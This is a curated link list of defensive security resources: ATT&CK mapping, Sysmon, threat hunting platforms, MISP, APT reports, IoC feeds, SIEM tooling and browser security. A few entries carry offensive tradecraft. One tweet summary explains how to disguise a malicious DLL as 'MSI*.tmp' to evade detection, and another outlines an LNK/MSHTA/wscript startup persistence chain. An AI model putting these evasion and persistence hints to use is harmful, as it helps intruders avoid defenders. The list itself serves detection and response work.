- [Windows-specific MITRE ATT&CK techniques application control prevention assessment.](https://gist.github.com/mgraeber-rc/6abcde0c0b19c0be0b8072876bf24941) This is a first attempt to assess the extent to which application control solutions would mitigate/prevent attack techniques. Note: this highly subjective assessment assumes a system that enforces an application control solution that at a minimum allows all Windows-signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications.
- [Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?](https://medium.com/mitre-attack/attack-april-2021-release-39accaf23c81)
- [EU MITRE ATT&CK® Community](https://www.attack-community.org/event/) [pdfs](https://web.tresorit.com/l/OUWDd#B7bBNMx6TeEH0nTCGzDgAw)
- [Mitre Att&ck Matri](https://github.com/CyberSecurityUP/Mitre-Attack-Matrix)
- [Best Practices for MITRE ATT&CK® Mapping](https://us-cert.cisa.gov/sites/default/files/publications/Best%20Practices%20for%20MITRE%20ATTCK%20Mapping.pdf) [cisa page](https://us-cert.cisa.gov/best-practices-mitre-attckr-mapping)
- [MITRE D3FEND](https://d3fend.mitre.org/faq/).
- [DeTTECT](https://github.com/rabobank-cdc/DeTTECT): Detect Tactics, Techniques & Combat Threats
- Sysmon:
- [Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were](https://gist.github.com/leoloobeek/a3a4d9af3bf7fb37b6d82a7a17e7176d)
- [Sysmon 12.0 — EventID 24](https://medium.com/falconforce/sysmon-12-0-eventid-24-31e0109c78e3): [Sysmon 12](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring.
- [SysmonX](https://github.com/marcosd4h/sysmonx): An Augmented Drop-In Replacement of Sysmon.
- [SysmonSimulator](https://github.com/ScarredMonk/SysmonSimulator): Sysmon event simulation utility which can be used to simulate the attacks to generate the Sysmon Event logs for testing the EDR detections and correlation rules by Blue teams.
- [Awesome Honeypots](https://github.com/paralax/awesome-honeypots): A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects.
- [T-Pot](https://github.com/telekom-security/tpotce): The All In One Honeypot Platform 
- [Blue Team Fundamentals](https://securitybytes.io/blue-team-fundamentals-4ee226368b7b)
- [Blue Team fundamentals Part Two](https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2): Windows Processes.
- [Sooty](https://github.com/TheresAFewConors/Sooty): The SOC Analysts all-in-one CLI tool to automate and speed up workflow.
- [Your detections aren't working](https://criminal.group/infosec/2020/08/20/your-detections-arent-working.html)
- [elastalert](https://github.com/Yelp/elastalert): Easy & Flexible Alerting With ElasticSearch
- [Technical Approaches to Uncovering and Remediating Malicious Activity](https://us-cert.cisa.gov/ncas/alerts/aa20-245a): Alert (AA20-245A).
- [EVTX-ATTACK-SAMPLES](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES): Windows Events Attack Samples [slides](https://github.com/sbousseaden/Slides)
- [Windows Advanced Audit Policy Map to Event IDs](https://docs.google.com/spreadsheets/d/1Lquvy7FHMXN_lRt-JYHnrUar5e2LAfldy-HTyhGcPoQ/edit#gid=0)
- [takuan](https://github.com/evilsocket/takuan) is a system service that parses logs and dectects noisy attackers in order to build a blacklist database of known cyber offenders.,
- [CobaltStrikeScan](https://github.com/Apr4h/CobaltStrikeScan): Scan files or process memory for CobaltStrike beacons and parse their configuration.
- [Hunting and detecting Cobalt Strike](https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/)
- [Cobalt Strike Beacon Analysis](https://isc.sans.edu/forums/diary/Quick+Tip+Cobalt+Strike+Beacon+Analysis/26818/). python decoder: [1768k](https://blog.didierstevens.com/2020/11/07/1768-k/)
- [How to Design Detection Logic - Part 1](https://blog.menasec.net/2020/11/how-to-design-detection-logic-part-1.html)
- [MitigatingPass-the-Hashand OtherCredential Theft](https://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-the-Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf)
- [Evilginx-ing into the cloud: How we detected a red team attack in AWS](https://expel.io/blog/evilginx-into-cloud-detected-red-team-attack-in-aws/)
- [Hidden Shares as bait](https://twitter.com/SwiftOnSecurity/status/1365473314316161032) [more](https://twitter.com/IISResetMe/status/1361009490791981070)
- [Blue Team 201: Detection](https://medium.com/the-lavender-project/blue-team-201-detection-where-do-you-start-76540dbceeb0) — Where Do You Start?
- [The DML model](https://ryanstillions.blogspot.com/2014/04/the-dml-model_21.html)
- [Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?](https://medium.com/mitre-attack/attack-april-2021-release-39accaf23c81)
- [hashlookup CIRCL API](https://hashlookup.circl.lu/). [he full dataset of NSRL (National Software Reference Library) NIST is imported](https://twitter.com/adulau/status/1405994677522812930)
- [BaselineTraining](https://github.com/rj-chap/BaselineTraining): Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk.
- [Practical Training for Blue Teamers](https://letsdefend.io/)
- [BLUE TEAM LABS ONLINE](https://blueteamlabs.online/)
- [Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis](https://www.mandiant.com/resources/defining-cobalt-strike-components)
- [There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram.](https://twitter.com/chrissanders88/status/1455896993398669323/photo/1)

### Threat Hunting

- [Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures](https://www.activecountermeasures.com/blog-wireshark-for-network-threat-hunting-creating-filters/)
- Talos Blog || Cisco Talos Intelligence Group - [Comprehensive Threat Intelligence](https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html): Adwind Dodges AV via DDE
- [strelka](https://github.com/target/strelka): Scanning files at scale with Python and ZeroMQ
- [Threat-Hunting](https://github.com/sapphirex00/Threat-Hunting): Personal compilation of APT malware from whitepaper releases, documents and own research
- [ThreatHunter-Playbook](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook): A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.
- [HELK](https://www.kitploit.com/2019/08/helk-hunting-elk.html) - [The Hunting ELK](https://github.com/Cyb3rWard0g/HELK): The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
- [mordor](https://github.com/Cyb3rWard0g/mordor): Re-play Adversarial Techniques.
- [ioc_writer](https://github.com/mandiant/ioc_writer): Provide a python library that allows for basic creation and editing of OpenIOC objects.
- [3 of the main observed false positive ive learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces)](https://twitter.com/SBousseaden/status/1197479954780446721). For #redteam u can blend in with mimicking case1 by naming ur module something like MSI*.tmp and using similar export fct name (dll path usually under c:\users\* so no high priv needed).
- [thethe](https://thethe.e-paths.com/): Simple, shareable, team-focused and expandable threat hunting environment. [The Threat Hunting Environment](https://github.com/ElevenPaths/thethe)
- Mordor PCAPs 📡:
- Part 1: [Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩](https://medium.com/threat-hunters-forge/mordor-pcaps-part-1-capturing-network-packets-from-windows-endpoints-with-network-shell-e117b84ec971)
- [cyber-threat-response-clinic](https://github.com/mosesrenegade/cyber-threat-response-clinic)
- [opencti](https://www.opencti.io): [Open Cyber Threat Intelligence Platform](https://github.com/OpenCTI-Platform/opencti)
- [securityonion](https://github.com/Security-Onion-Solutions/securityonion): Security Onion 2.0 (Pre-release) - Linux distro for threat hunting, enterprise security monitoring, and log management
- [TheHive](https://github.com/TheHive-Project/TheHive): a Scalable, Open Source and Free Security Incident Response Platform
- [TheHive4py](https://github.com/TheHive-Project/TheHive4py): Python API Client for TheHive
- [TheHiveIRPlaybook](https://github.com/cdefid/TheHiveIRPlaybook) is a collection of TheHive case templates used for Incident Response
- [Cortex-Analyzers](https://github.com/TheHive-Project/Cortex-Analyzers/tree/master/thehive-templates): Cortex Analyzers Repository
- [Nimbus Network](https://team-cymru.com/community-services/nimbus/) Traffic Analyzer Augmented with our world-class threat intelligence.
- [ja3](https://github.com/salesforce/ja3) is a standard for creating SSL client fingerprints in an easy to produce and shareable way.
- [Threat Hunting Process](https://github.com/rcfontana/ContentSharing)
- [Threat Hunting Princiĺes](https://github.com/sbousseaden/Slides)
- [TypeDB CTI](https://github.com/typedb-osi/typedb-data-cti): [Open Source Threat Intelligence Platform](https://blog.vaticle.com/introducing-a-knowledge-graph-for-cyber-threat-intelligence-with-typedb-bdb559a92d2a)
- Some repos from hunters-forge: [API-To-Event](https://github.com/hunters-forge/API-To-Event), [notebooks-forge](https://github.com/hunters-forge/notebooks-forge), [BloodHound Notebooks](https://github.com/hunters-forge/bloodhound-notebooks)
- [Yeti](https://github.com/yeti-platform/yeti): [Your Everyday](https://yeti-platform.github.io/) [Threat Intelligence](https://github.com/fr0gger/yeti)
- [Watcher](https://github.com/Felix83000/Watcher): Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS.
- Network Analysys:
- [traffic-analysis-workshop](https://github.com/pan-unit42/traffic-analysis-workshop) and [wireshark-tutorial-decrypting-HTTPS-traffic](https://github.com/pan-unit42/wireshark-tutorial-decrypting-HTTPS-traffic)
- [Wireshark Tutorial: Exporting Objects from a Pcap](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
- [Hex Packet Decoder](https://hpd.gasmi.net/): Hex Packet Decoder provides an [HTTP API](https://hpd.gasmi.net/api.html) for you to parse network packets.
- [Packetor](http://packetor.com/): Packetor is an online hex-dump packet analyzer / decoder.
- [Termshark](https://termshark.io/): [A terminal UI for tshark](https://github.com/gcla/termshark), inspired by Wireshark.
- [Wireshark Tutorial: Wireshark Workshop Videos Now Available](https://unit42.paloaltonetworks.com/wireshark-workshop-videos/)
- [Wireshark Tutorial: Decrypting HTTPS Traffic](https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/)
- [Lookup Before You Go-Go...Hunting](https://www.splunk.com/en_us/blog/security/lookup-before-you-go-go-hunting.html).
- [Insider Threat Hunting](http://findingbad.blogspot.com/2020/07/insider-threat-hunting.html) and [It's all in the numbers](http://findingbad.blogspot.com/2020/05/its-all-in-numbers.html).
- [Wazuh](https://wazuh.com/): is a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. [repo](https://github.com/wazuh/wazuh) and [ansible](https://github.com/wazuh/wazuh-ansible)
- [Hunting the Hunters - RCE in Covenant C2](https://blog.null.farm/hunting-the-hunters). [PoC Video](https://www.youtube.com/watch?v=4z_LKfNzpfI)
- [Passive SSH](https://d4-project.github.io/passive-ssh/): Passive SSH is an open source framework composed of a scanner and server to store and lookup the SSH keys and fingerprints per host (IPv4/IPv6/onion). repo: [passive-ssh](https://github.com/d4-project/passive-ssh)
- [EVTX-ATTACK-SAMPLES](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES): Windows Events Attack Samples.
- [Cyber Threat Intelligence](https://cti-lib.github.io/)
- [Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar](https://blog.checkpoint.com/2021/01/13/cloud-threat-hunting-attack-investigation-series-lateral-movement-under-the-radar/)
- [D4 core](https://github.com/D4-project/d4-core): D4 core software (server and sample sensor client).
- [A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence](https://medium.com/katies-five-cents/a-top-10-reading-list-if-youre-getting-started-in-cyber-threat-intelligence-c11a18fc9798)
- [CTI SquadGoals](https://sroberts.medium.com/cti-squadgoals-setting-requirements-41bcb63db918) — Setting Requirements
- [Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats](https://www.youtube.com/watch?v=3CUNlgQBwc4)
- [BeaconEye](https://github.com/CCob/BeaconEye): Hunts out CobaltStrike beacons and logs operator command output.
- SANS DShiled [Datafeeds/API](https://isc.sans.edu/forums/diary/Updates+to+Our+DatafeedsAPI/27824/).
- [The State of Threat Hunting and the Role of the Analyst](https://team-cymru.com/wp-content/uploads/2021/08/Ponemon_State-of-Threat-Hunting-Role-of-Analyst_Report_August-2021.pdf)
- [Deepfence ThreatMapper](https://github.com/deepfence/ThreatMapper): Identify vulnerabilities in running containers, images, hosts and repositories.
- [SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike](https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html)
- [All Access Pass: Five Trends with Initial Access Brokers](https://ke-la.com/all-access-pass-five-trends-with-initial-access-brokers/). [Initial Access Broker Landscape](https://www.curatedintel.org/2021/10/initial-access-broker-landscape.html) [tt](https://twitter.com/jorgeorchilles/status/1452739074775781390/photo/1)


- [Paint it, Blue - Transitionin from CTI to HUNT](https://github.com/ch33r10/BlueSpace2021): Ekoparty's BlueSpace Keynote November 2021. Shoutout to @plugxor Muchas Gracias!!!

#### MISP

- [MISP (core software)](https://github.com/MISP/MISP) - Open Source Threat Intelligence Platform (formely known as Malware Information Sharing Platform)
- [MISP galaxy](https://github.com/MISP/misp-galaxy): Clusters and elements to attach to MISP events or attributes (like threat actors)
- [DigitalSide Threat-Intel](https://github.com/davidonzo/Threat-Intel): Threat-Intel repository. [API](https://github.com/davidonzo/apiosintDS)
- [MISP-sizer](https://github.com/MISP/MISP-sizer): Sizing your MISP instance.
- [MISP RPM](https://github.com/amuehlem/MISP-RPM): RPM packages for MISP
- [ansible MISP](https://github.com/juju4/ansible-MISP): ansible role to setup MISP, Malware Information Sharing Platform & Threat Sharing.
- [MISP CERT.br](https://www.cert.br/misp/)
- [misp-warninglist](https://github.com/MISP/misp-warninglists): Warning lists to inform users of MISP about potential false-positives or other information in indicators
- [MISP-maltego](https://github.com/MISP/MISP-maltego): Set of Maltego transforms to inferface with a MISP Threat Sharing instance, and also to explore the whole MITRE ATT&CK dataset.
- [misp-modules](https://github.com/MISP/misp-modules): Modules for expansion services, import and export in MISP
- [misp-taxonomies](https://github.com/MISP/misp-taxonomies): Taxonomies used in MISP taxonomy system and can be used by other information sharing tool.
- [PyMISP](https://github.com/MISP/PyMISP): Python library using the MISP Rest API
- [MISP Concepts Cheat sheet](https://www.misp-project.org/misp-training/cheatsheet.pdf)
- [CyCAT.org API services](https://github.com/CyCat-project/cycat-service): API back-end server including crawlers.
- [teslacoil.py](https://gist.github.com/lopes/a0366fc6a231eee38973e7e3e18c91e5): Monitors some log files and send new entries to syslog.
- Tutorials:
- [MISP Training - Youtube CIRCL](https://www.youtube.com/playlist?list=PLhSWiKucshm4CfNjKm7cxxjmj8LfxRXdp)
- [Youtube CIRCL](https://www.youtube.com/playlist?list=PLhSWiKucshm6Y01mAwBaF-mAPLuYKNrcc)
- [PyMISP and MISP Objects: a door to new opportunities](https://youtu.be/GGaP6eiVXGk)
- [Additional MISP training materials (including slides, documentation and videos](https://github.com/MISP/misp-training)
- [Additional MISP training materials for law-enforcement agencies](https://github.com/MISP/misp-training-lea)

#### APT - Advanced Persistent Threat

- APT33: [More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting](https://blog.trendmicro.com/trendlabs-security-intelligence/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting/). [Iranian hacking group built its own VPN network](https://www.zdnet.com/article/iranian-hacking-group-built-its-own-vpn-network/). [APT33, the Iranian hacking group behind Shamoon, built its own VPN network](https://twitter.com/campuscodi/status/1194872593750216704).
- [Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack](https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/)
- [Adversary Reports](https://dragos.com/adversaries/): The latest whitepapers, solution briefs, and datasheets from Dragos
- [APT29 targets COVID-19 vaccine development](https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development)
- [What is APT28's Drovorub Malware?](https://blog.cygenta.co.uk/drovorub-apt/). [FBI and NSA report](https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF)
- [Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS'​ Malware at Scale](https://www.linkedin.com/pulse/dispatches-from-drovorub-network-threat-hunting-russia-dan-gunter/)
- [Tracking A Malware Campaign Through VT](https://isc.sans.edu/forums/diary/Tracking+A+Malware+Campaign+Through+VT/26498/)
- [More Evidence of APT Hackers-for-Hire Used for Industrial Espionage](https://www.bitdefender.com/files/News/CaseStudies/study/365/Bitdefender-PR-Whitepaper-APTHackers-creat4740-en-EN-GenericUse.pdf)
- APT41: [US Charges Five Alleged Members of APT41 Group](https://duo.com/decipher/us-charges-five-alleged-members-of-apt41-group)
- [Analysis Report (AR20-268A)](https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a)
- CYPRESS - [Cyber Planning for Response and Recovery Study](https://cms.ferc.gov/sites/default/files/2020-09/FERC%26NERC_CYPRES_Report.pdf) 2020 FERC, NERC and REs Report.
- CHIMBORAZO [TA505](https://twitter.com/MsftSecIntel/status/1313598440719355904)
- Threat Group Cards: [A Threat Actor Encyclopedia](https://apt.thaicert.or.th/cgi-bin/aptgroups.cgi).
- [Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor](https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html). [BADministration](https://ijustwannared.team/2019/07/13/badministration-solarwinds/) [repo](https://github.com/ThunderGunExpress/BADministration), symantec: [Supply Chain Attack Targets SolarWinds Users](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds). [DGA domain names from](https://github.com/RedDrip7/SunBurst_DGA_Decode) SunBurst_DGA_Decode
- [SolarWinds Security Advisory](https://www.solarwinds.com/securityadvisory)
- [If you work in a SOC, print out this screenshot & pin it to a wall in your office](https://twitter.com/cyb3rops/status/1396876632678445059)
- [Customer Guidance on Recent Nation-State Cyber Attacks](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/)
- [Mapping out AridViper Infrastructure Using Augury’s Malware Module](https://team-cymru.com/blog/2020/12/16/mapping-out-aridviper-infrastructure-using-augurys-malware-addon/)
- [The Story of Jian](https://research.checkpoint.com/2021/the-story-of-jian/): How APT31 Stole and Used an Unknown Equation Group 0-Day
- [APT Encounters of the Third Kind](https://igor-blue.github.io/2021/03/24/apt1.html)
- [Lazarus APT conceals malicious code within BMP image to drop its RAT](https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/) - found new [weaponized Word document](https://twitter.com/ESETresearch/status/1389904254811394049)
- [distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript.](https://twitter.com/ffforward/status/1456239300593524741)
- [Analysis of the Iranian cyber attack landscape](https://www.ironnet.com/blog/iranian-cyber-attack-updates)
- [Lemon Duck spreads its wings](https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html): Actors target Microsoft Exchange servers, incorporate new TTPs.
- [threat actortouching an endpoint](https://twitter.com/UK_Daniel_Card/status/1372481165752471552/photo/1)
- [China’s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation](https://www.recordedfuture.com/china-pla-unit-purchasing-antivirus-exploitation/)
- [APTnotes](https://github.com/aptnotes/data) is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets. [some tools](https://github.com/aptnotes/tools)
- [The Active Adversary Playbook 2021](https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/): Attacker behaviors, tactics, techniques and procedures (TTPs).
- [An Update on Industrialize the Tracking of Botnet Operations](https://raw.githubusercontent.com/D4-project/d4-website/master/assets/slides/20211020-secure2021-pl.pdf)
- [Patchwork APT caught in its own web](https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/)
- [Armagedon/Gamaredon](https://twitter.com/JohnHultquist/status/1456249671941251073)
- [North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign](https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/)
- [Update on cyber activity in Eastern Europe](https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/)
- [Cisco Talos shares insights related to recent cyber attack on Cisco](https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html)

### IoCs

- [sophos labs IoCs](https://github.com/sophoslabs/IoCs): Sophos-originated indicators-of-compromise from published
- [DailyIOC](https://github.com/StrangerealIntel/DailyIOC): IOC from articles, tweets for archives
- [CVE-2020-1472 Zerologon IoCs](https://otx.alienvault.com/pulse/5f74a1a450843553be3ed593)
- [iocs](https://github.com/pan-unit42/iocs): Indicators from Unit 42 Public Reports
- [Threat intelligence and threat detections](https://github.com/swisscom/detections): Threat intelligence and threat detection indicators (IOC, IOA).
- [APT_Digital_Weapon](https://github.com/RedDrip7/APT_Digital_Weapon): Indicators of compromise (IOCs) collected from public resources and categorized by Qi-AnXin.
- [Ryuk Speed Run, 2 Hours to Ransom](https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/)
- [What did DeathStalker hide between two ferns?](https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/)
- [Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP](https://twitter.com/GossiTheDog/status/1405805536403243009)
- [Netfilter Rootkit Samples](https://docs.google.com/spreadsheets/d/1FYgBmJH8MOli99oIqRsIHJA2XzI3aSdAOb9mZmqj_q0/edit#gid=1028909258)
- [Feodo Tracker](https://feodotracker.abuse.ch/browse/) tracks certain families that are related or that evolved from Feodo
- [There are evil packages on the npm registry that deploy XMRIG](https://twitter.com/jhencinski/status/1451592508157345793)
- [Emotet 2022 | epoch4 | 22.04.2022 |](https://github.com/pr0xylife/Emotet/blob/main/e4_emotet_22.04.2022.txt)
- [238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today.](https://twitter.com/cobaltstrikebot/status/1521576446107406336) [list](https://pastebin.com/a0MYdwKf)
- [malware-IoC](https://github.com/CyberThreatIntelligenceENTEL/malware-IoC/): Bienvenidos al repositorio oficial de IoC del equipo de Cyber Threat intelligence de Entel Cyber Secure
- [IcedID | 31.08.2022 | Campaign 2786525712](https://github.com/pr0xylife/IcedID/blob/main/icedID_31.08.2022.txt)

### SIEM

- [Sigma](https://github.com/SigmaHQ/sigma): Generic Signature Format for SIEM Systems
- [Suspicious Use of Procdump](https://github.com/Neo23x0/sigma/blob/master/rules/windows/builtin/win_susp_procdump.yml): Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.
- [KrbRelayUp local privilege escalation.](https://github.com/tsale/Sigma_rules/blob/main/windows_exploitation/KrbRelayUp.yml)
- [Events Heatmap](https://codepen.io/anon/pen/wYbpVW)
- [RedELK](https://github.com/outflanknl/RedELK): Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
- [plaso](https://github.com/log2timeline/plaso/): Super timeline all the things.
- [Heatmaps Make Ops Better](https://www.honeycomb.io/blog/heatmaps-make-ops-better/)
- [graylog-guide-snort](https://github.com/Graylog2/graylog-guide-snort): How to send structured Snort IDS alert logs into Graylog
- [TALR](https://github.com/SecurityRiskAdvisors/TALR): Threat Alert Logic Repository
- [Auditing Continuously vs. Monitoring Continuously](https://medium.com/faun/auditing-continuously-vs-monitoring-continuously-749e7c248d92)
- [Logsspot](https://github.com/hackunagi/logsspot): Logsspot is a project created to help cybersec folks understand what kind of information a security technology can present and how to use to improve detection and intelligence.
- [Corsair](https://github.com/forkd/corsair): Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC).
- [Scalable Logging and Tracking](https://medium.com/netflix-techblog/scalable-logging-and-tracking-882bde0ddca2)
- [Logs were our lifeblood. Now they're our liability.](https://vicki.substack.com/p/logs-were-our-lifeblood-now-theyre)
- [Using Flume to Collect Apache 2 Web Server Logs](https://www.facebook.com/notes/cloudera/using-flume-to-collect-apache-2-web-server-logs/427841847002/)
- [spectx](https://www.spectx.com/): Instantly parse and investigate raw log files
- [The log/event processing pipeline you can't have](https://apenwarr.ca/log/20190216)
- [Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance](https://medium.com/bugbountywriteup/building-a-siem-combining-elk-wazuh-hids-and-elastalert-for-optimal-performance-f1706c2b73c6)
- [Here's a Splunk way to score behaviors that are derived from detections](https://twitter.com/jackcr/status/1322178539496607744).
- [ProductLoggingTracker](https://github.com/JasonMorrow43/ProductLoggingTracker): Simple list of product types that InfoSec professionals may want to collect into a central repository
- [The Log Pile](https://what2log.com/logpile/): scripts to help witch log to save.
- [Part of my role is ensuring we're *not* EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM](https://twitter.com/jhencinski/status/1405595230737416198/photo/1)
- [LORG](https://github.com/jensvoid/lorg): Apache Logfile Security Analyzer.
- [Shipping to Elasticsearch Microsoft DNS Logs](https://isc.sans.edu/forums/diary/Shipping+to+Elasticsearch+Microsoft+DNS+Logs/27828/)
- [Windows 10 ETW Events](https://github.com/jdu2600/Windows10EtwEvents): Events from all manifest-based and mof-based ETW providers across Windows 10 versions.
- [Log Parser Lizard](https://www.lizard-labs.com/log_parser_lizard_download.aspx): provides a modern graphical user interface to Microsoft Log Parser 2.2 for analyzing logs using SQL queries.
- [Fluentd](https://github.com/fluent/fluentd): Unified Logging Layer (project under CNCF)
- [Laurel](https://github.com/threathunters-io/laurel): Transform Linux Audit logs for SIEM usage
- [Matano](https://github.com/matanolabs/matano): The open-source [security lake platform for AWS](https://www.matano.dev/blog/2022/08/11/announcing-matano).

## Browsers

- [SOK: On the Analysis of Web Browser Security](https://arxiv.org/abs/2112.15561v1)
- [Bypassing Browser Security Warnings with Pseudo Password Fields](https://www.troyhunt.com/bypassing-browser-security-warnings-with-pseudo-password-fields/)
- The 9 Lives of Bleichenbacher's CAT: [New Cache ATtacks on TLS Implementations](https://www.nccgroup.trust/us/our-research/the-9-lives-of-bleichenbachers-cat-new-cache-attacks-on-tls-implementations/)
- [How To Blow Your Online Cover With URL Previews](https://hunch.ly/osint-articles/osint-article-how-to-blow-your-online-cover)
- [Nefarious LinkedIn](https://prophitt.me/articles/nefarious-linkedin): A look at how LinkedIn exfiltrates extension data from your browser.
- [Lightnion](https://github.com/spring-epfl/lightnion): A light version of Tor portable to the browser.
- [Puppeteer](https://github.com/GoogleChrome/puppeteer): Headless Chrome Node API. [site](https://pptr.dev/)
- [uBlock Origin](https://github.com/gorhill/uBlock): An efficient blocker for Chromium and Firefox. Fast and lean.
- [autochrome](https://github.com/nccgroup/autochrome): This tool downloads, installs, and configures a shiny new copy of Chromium.
- [BROWSERGAP](https://browsergap.xyz/):Browse Anything Securely, Browse the web without the web browsing you.
- [browsergap.ce](https://github.com/dosycorp/browsergap.ce): Simple Isolated Remote Browsers, Open Source
- [Crash Chrome](https://gist.github.com/DavidBuchanan314/2e76e05b019afb16d4b294ba9c566c42).
- [Firefox: How a website could steal all your cookies](https://medium.com/bugbountywriteup/firefox-and-how-a-website-could-steal-all-of-your-cookies-581fe4648e8d)
- [Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique](https://thehackernews.com/2021/02/online-trackers-increasingly-switching.html)

### Browsers Addons

- [Addons for Firefox](https://twitter.com/hackermaderas/status/1213872817789456384):
- [LinkGopher](https://addons.mozilla.org/en-US/firefox/addon/link-gopher/)
- [(Image) WebDeveloper](https://addons.mozilla.org/en-US/firefox/addon/web-developer/)
- [(Image) IPvFoo](https://addons.mozilla.org/en-US/firefox/addon/ipvfoo-pmarks/)
- [DownthemAll](https://addons.mozilla.org/en-US/firefox/addon/downthemall/?src=search)
- [SixorNot](https://addons.mozilla.org/en-US/firefox/addon/sixornot/)
- [Uppity](https://addons.mozilla.org/en-US/firefox/addon/uppity/?src=search)
- [Cliget](https://addons.mozilla.org/en-US/firefox/addon/cliget/?src=search)
- [(Image) URLs List](https://addons.mozilla.org/en-US/firefox/addon/urls-list/?src=search)
- [Link Redirect Trace](https://addons.mozilla.org/en-US/firefox/addon/link-redirect-trace-addon/)
- [Tamper Data for FF Quantum](https://addons.mozilla.org/en-US/firefox/addon/tamper-data-for-ff-quantum/)
- [BuiltWith](https://addons.mozilla.org/en-US/firefox/addon/builtwith/)
- [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/)
- [Exif Viewer](https://addons.mozilla.org/en-US/firefox/addon/exif-viewer/?src=search)
- [Anti-Grabify Browser Extension](https://github.com/Konnor88/anti-grabify/)

## Operating Systems

- [bochspwn-reloaded](https://github.com/google/bochspwn-reloaded): A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
- [drltrace](https://github.com/mxmssh/drltrace): Drltrace is a library calls tracer for Windows and Linux applications.
- [shellz](https://github.com/evilsocket/shellz): is a small utility to track and control your ssh, telnet, web and custom shells.
- [CLIP OS](https://www.ssi.gouv.fr/en/actualite/clip-os-open-source-secured-operating-system/): Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information
